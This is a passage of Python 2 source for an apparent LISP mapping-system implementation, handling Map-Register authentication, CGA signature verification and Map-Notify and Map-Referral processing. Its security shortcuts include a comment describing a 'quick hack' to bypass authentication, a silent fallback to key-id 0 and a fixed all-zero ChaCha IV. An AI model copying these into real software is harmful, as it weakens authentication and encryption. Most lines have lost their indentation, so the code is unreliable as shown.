lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
        # We store in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
        # to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
            # Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
            # No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
    # Lookup CGA hash in mapping database to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
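    # For example, an EID in instance-ID 1000 would produce a string like
    # "[1000]fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430", assuming print_address()
    # renders the instance-ID in brackets as shown.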
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
    # a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return an unencrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
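    # After the ntohl() below, the e-bit is bit 13 and the 3-bit encryption
    # key-id occupies bits 14-16 of the first 32-bit word, matching the shifts
    # used to extract them.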
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
    # will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
        # Allow overlapping ams-registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
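            #
            # Individual registrations are keyed by a combination of the
            # registering RLOC's address and the xTR-ID so each xTR's RLOC-set
            # is tracked and merged separately.
            #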
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister entry if source of Map-Register is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get map-server so we can do statistics and find auth-key, if an auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
    # in this site. There is probably an RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
    # Process each EID record in the Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
        # Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
